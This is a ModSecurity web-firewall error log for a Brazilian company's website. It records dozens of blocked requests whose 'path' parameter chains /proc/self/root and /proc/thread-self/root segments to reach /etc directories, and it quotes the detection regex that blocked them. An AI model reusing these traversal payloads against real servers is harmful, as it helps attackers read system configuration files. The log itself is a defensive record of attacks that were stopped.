[Tue Mar 17 12:30:34.841799 2026] [:error] [pid 2473:tid 140411641214720] [client 74.7.241.46:50598] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzmqBJNF7axNlVR0UOJgAAAAw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 12:30:40.653482 2026] [:error] [pid 11293:tid 140411691570944] [client 74.7.243.203:39990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzoNCmCSWTlPouqorc6gAAAMY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:30:52.823587 2026] [:error] [pid 11293:tid 140411683178240] [client 74.7.243.203:39990] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzrNCmCSWTlPouqorc7wAAAMc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:30:54.011120 2026] [:error] [pid 7437:tid 140411741927168] [client 74.7.241.46:40280] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzrgeiSKl8TjouI-YSlAAAA8A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:30:58.698460 2026] [:error] [pid 18380:tid 140411674785536] [client 74.7.243.203:57354] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzsq4xEDsg_V3ESNZDYAAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:31:08.824223 2026] [:error] [pid 17965:tid 140411716749056] [client 74.7.243.203:57364] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzvKt8Nd0UC_OcbVHDGwAAAIM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:31:10.847668 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.241.46:40022] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzvhj0p0SRWAqcjGFx2wAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:31:20.656555 2026] [:error] [pid 2160:tid 140411699963648] [client 74.7.243.203:43138] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzyDjrdei6i7MVRTDUMAAAAQU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:31:21.315208 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.46:36686] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzydY0UrI5A3LftIzzZwAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:31:26.973399 2026] [:error] [pid 17965:tid 140411624429312] [client 74.7.243.203:43140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablzzqt8Nd0UC_OcbVHDJgAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:31:36.398976 2026] [:error] [pid 9299:tid 140411616036608] [client 74.7.243.203:34728] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablz2L-sgTmmJoPuMdyvDQAAAs8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:31:38.886637 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.243.203:34738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablz2tY0UrI5A3LftIzzeAAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:31:39.340147 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.203:34738] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablz29Y0UrI5A3LftIzzegAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:31:43.728728 2026] [:error] [pid 9299:tid 140411725141760] [client 74.7.243.203:49254] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablz37-sgTmmJoPuMdyvDwAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:31:48.723520 2026] [:error] [pid 17965:tid 140411708356352] [client 74.7.243.203:49268] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablz5Kt8Nd0UC_OcbVHDNAAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:31:59.687449 2026] [:error] [pid 18380:tid 140411699963648] [client 74.7.243.203:45438] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablz764xEDsg_V3ESNZDbwAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:32:03.571694 2026] [:error] [pid 2598:tid 140411565680384] [client 74.7.243.203:40396] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablz8xj0p0SRWAqcjGFx5gAAAxU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:32:11.387251 2026] [:error] [pid 9299:tid 140411557287680] [client 74.7.243.203:40410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablz-7-sgTmmJoPuMdyvGAAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:32:13.987912 2026] [:error] [pid 9299:tid 140411725141760] [client 74.7.243.203:40410] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablz_b-sgTmmJoPuMdyvGgAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:32:14.335163 2026] [:error] [pid 2598:tid 140411708356352] [client 74.7.244.31:35298] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablz_hj0p0SRWAqcjGFx5wAAAwQ"]
[Tue Mar 17 12:32:27.304839 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.241.46:51360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0C9CmCSWTlPouqordFgAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 12:32:28.624707 2026] [:error] [pid 9299:tid 140411708356352] [client 74.7.241.46:41844] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0DL-sgTmmJoPuMdyvHAAAAsQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 12:32:45.611170 2026] [:error] [pid 9155:tid 140411691570944] [client 74.7.241.46:41854] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abl0HdbI7zhHXcabyMU3hAAAAkY"], referer: 